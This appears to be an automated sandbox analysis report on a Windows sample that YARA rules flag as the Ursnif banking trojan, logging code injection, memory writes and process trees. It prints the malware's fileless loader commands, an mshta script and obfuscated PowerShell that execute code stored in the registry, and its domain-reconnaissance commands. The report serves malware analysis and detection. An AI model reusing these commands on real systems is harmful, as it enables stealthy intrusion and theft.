Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075D977 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302D977 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: apnfy.msn.com
Source: C:\Windows\explorer.exe	Domain query: www.msn.com

Maps a DLL or memory area into another process

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write
Source: C:\Windows\System32\cmd.exe	Section loaded: unknown target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2240CB00000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D023B80000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 148997F0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D00000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1CEDB0F0000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1FA9D410000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1AF8B460000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9ABD1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Lx6.exe	Memory written: C:\Windows\System32\control.exe base: 7FF712EA12E0
Source: C:\Users\user\Desktop\Lx6.exe	Memory written: C:\Windows\System32\control.exe base: 7FF712EA12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 6C6000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FF89ABD1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 27C0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FF89ABD1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9BF5850000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2240CB00000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9FF00FB000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D023B80000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: E1A059000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 148997F0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: DA6FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D00000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: DA6FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 7FF632277380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CEDB0F0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 7FF632277380
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF635983220
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 191D1E60000
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF635983220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 19932670000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 24EF3D30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1FA9D410000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1AF8B460000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3528 base: 6C6000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3528 base: 7FF89ABD1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3528 base: 27C0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3528 base: 7FF89ABD1580 value: 40

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3528
Source: C:\Windows\explorer.exe	Thread register set: target process: 3124
Source: C:\Windows\explorer.exe	Thread register set: target process: 4372
Source: C:\Windows\explorer.exe	Thread register set: target process: 4552
Source: C:\Windows\explorer.exe	Thread register set: target process: 5832
Source: C:\Windows\explorer.exe	Thread register set: target process: 1920
Source: C:\Windows\System32\cmd.exe	Thread register set: target process: 6064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 5836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3536
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Thread register set: target process: 1716
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Thread register set: target process: 5240

Source: unknown	Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>ccqf='wscript.shell';resizeto(0,2);eval(new activexobject(ccqf).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([system.text.encoding]::ascii.getstring((wslluui "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([system.text.encoding]::ascii.getstring((wslluui "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))

Source: C:\Users\user\Desktop\Lx6.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\more.com more
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"

Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Managerzx
Source: explorer.exe, 0000000E.00000000.542446129.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.518351829.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.501749346.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.530080768.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.459146583.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanath
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Lx6.exe

Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0076B568 cpuid

Source: C:\Users\user\Desktop\Lx6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_00401927 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0076915C GetUserNameA,GetSystemTimeAsFileTime,HeapFree,

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0076D4C8 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_004019F9 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
